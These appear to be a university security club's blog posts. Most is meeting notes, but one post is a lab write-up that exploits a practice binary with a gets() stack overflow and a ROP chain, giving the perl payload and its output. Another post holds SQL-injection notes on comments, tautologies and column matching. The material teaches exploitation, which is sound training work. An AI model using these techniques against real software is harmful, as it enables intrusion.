No meeting this week. Enjoy your break!
No meeting this week. Enjoy your break!
Kris wrote a clever program with some interesting constants inside to be able to illustrate all of these concepts in a single binary. There are several things you can do here.
Basic stack overflow. Get the program to call a function that is compiled in, but not used in the standard flow of control. Then call it with appropriate arguments.
More advanced stack overflow, with ROP. Call the hidden function several times, with appropriate arguments each time.
Get shell on a system with ASLR, using the hidden constant.
???? Do something more awesome!!!!
file b2 b2: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
okay, 32-bit linux elf.
strings b2 /lib/ld-linux.so.2 gmon_start libc.so.6 IO_stdin_used gets puts printf __libc_start_main GLIBC_2.0 PTRh@ UWVS [^] WTF %d %d %d Hello, %s! What is your name? ;*2$”
looks like some format strings in there.
./b2 What is your name? hacker Hello, hacker!
perl -e ‘print “A”x400 ;’ | ./b2 What is your name? Hello, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! Segmentation fault
Let’s take an assembly listing of the interesting parts for future reference
objdump -d -M intel b2
We can see that this wtf function never gets called, as it has a print statement, but we never saw anything like that in our output.
sayhello has what looks like a ~200 byte buffer from
8048468: 81 ec e8 00 00 00 sub esp,0xe8
and more importantly that it is using gets to read, which means we can put anything but nul chars into it, and it will read them into the buffer. This is our vulnerable code fragment!
Alright, now let’s look at it in gdb.
Calling hidden WTF function with correct arguments multiple times.
** WTF with correct arguments to call wtf more than once, with arguments, we need a ‘cleanup’ program what this needs to do is move the stack pointer down two four-byte groups so that we jump over the parameters to wtf. the return at the end of wtf, and the ‘cleanup’ series, get’s rid of the other two addresses. Thus we can repeat that four four-byte sequence as many times as we want (realistically until it segfaults from the initial overflow.)
*** finding rops poor man’s rop finder, using objdump and searching for pop,pop,ret sequence.
two pops and a return 8048402: 5b pop ebx 8048403: 5d pop ebp 8048404: c3 ret
four pops and a return 804852c: 5b pop ebx 804852d: 5e pop esi 804852e: 5f pop edi 804852f: 5d pop ebp
two pops and a return 8048577: 5b pop ebx 8048578: 5d pop ebp 8048579: c3 ret
** final exploit code. REMEMBER: Addresses are little endian on x86
perl -e ‘print “A”x212 . ”\x34\x84\x04\x08” . “\x02\x84\x04\x08” . “\x00\x00\x00\x00” . “\xFF\xFF\xFF\xFF” \ . “\x34\x84\x04\x08” . “\x77\x85\x04\x08” . “\x00\x00\x00\x00” . “\xFF\xFF\xFF\xFF” \ . “\x34\x84\x04\x08” . “\x2e\x85\x04\x08” . “\x00\x00\x00\x00” . “\xFF\xFF\xFF\xFF” ;’ | ./b2 | | ^ 0 ^ -1 | ^ three different addresses with correct assembly instructions ^ start address of wtf
What is your name?
Hello, 4! WTF 0 -1 15007500 WTF 0 -1 15007500 WTF 0 -1 15007500 Segmentation fault
Graceful termination is not the point here.
We continued messing with the binary from the previous week, until everyone had understood at least some significant fraction of it.
We met in the CSE dungeon at 6pm and started at 6:15pm in 1151 McCarty A.
We started with making sure everyone was on the ListServ.
Then Kris gave us an introduction to binary reversing and a helloworld example using gdb and Ida.
Erik Cabetas from Include Security joined us to talk about future opportunities for the club, Capture the Flag Competitions, and about careers in computer security. Also, Include Security sponsored us with pizza!
Next meeting we will work on a binary reversing example provided by Include Security.
We ended saying we would meet in CSE 404 next Thursday at 6:15 with more pizza.
We were on the second floor in one of the E22X rooms.
14 attending. Here are some of them.
We talked about the wordpress blog and it’s existence.
Our fearless leader exhorting about the blogoration.
The subject of the day was SQL Injection, and the presenter was Christian (cvk).
I took some rather limited notes. I had to leave early. Maybe Matt can fill in what else there was. I also took the exact url down, cause that seems like a good idea to me.
PHP is super dumb by default. start at the top and go to the bottom.
MySQL comments ‘ – ’ not sure if space on front or back is needed, so did both
Tautology: A statement that is true as it is a restatement of it’s own definition. 1 = 1 is a tautology.
Evaluation of comparison of string to int, converts one to other before doing comparison, so 5 =‘5’ works.
As we need to be able to create arbitrary sized tables, use an unqualified select. select 1, 2, 3, 4; this results in a table with 4 columns.
Finally, for our topic after we return from break, we should be covering some binary reversing.